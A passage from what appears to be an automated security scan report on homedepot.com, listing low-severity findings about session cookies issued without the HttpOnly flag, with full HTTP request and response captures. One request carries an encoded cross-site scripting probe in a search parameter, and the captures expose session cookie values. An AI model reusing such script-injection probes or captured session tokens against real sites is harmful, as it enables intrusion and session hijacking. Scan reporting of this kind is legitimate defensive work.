THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223792094%3a%3bC25%5fEXP%3d1360063792%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=4; s_pers=%20s_campaign%3Dno%2520value%7C1308225658356%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225658360%3B%20p_30%3DSubcategory%7C1308225658363%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

11.21. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223220
Expires: Thu, 16 Jun 2011 12:15:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:15:46 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=QolLt0HmGKtgnMXrHDVRUVhne1g%3d%0a%3b2011%2d06%2d16+08%3a15%3a45%2e967%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:19:13 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230145967%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cOvVzEI6Oajqj7Z9XG6ty%2bZOWJoA%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...

11.22. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223758601%3a%3bC25%5fEXP%3d1360063758%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:29:18 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.23. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227634455%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cUvZV8SbnxtrKAy1Jq5PlIZvD2PQ%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224034071%3a%3bC25%5fEXP%3d1360064034%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:54 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

11.24. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Navigation

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223632170%3a%3bC25%5fEXP%3d1360063632%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:27:12 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.25. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227632737%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cEriWalDUCEKDarFJ9VNwX5TqsXg%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816032%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252F